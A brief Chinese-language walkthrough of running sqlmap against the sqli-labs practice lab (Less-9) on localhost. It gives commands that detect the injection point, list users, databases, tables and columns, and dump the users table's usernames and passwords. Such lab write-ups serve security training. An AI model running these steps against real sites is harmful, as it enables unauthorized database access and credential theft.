1.初始状态:
2.检测是否存在漏洞:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1
3.获取当前用户及数据库:
当前用户:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1 --current-user
当前数据库:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1 --current-db
所有数据库:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1 --dbs
4.获取当前数据库表名:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1 -D security --tables
5.获取当前数据库users表所有列:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1 -D security -T users --columns
6.获取用户名及密码:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-9/?id=1 -D security -T users -C username,password --dump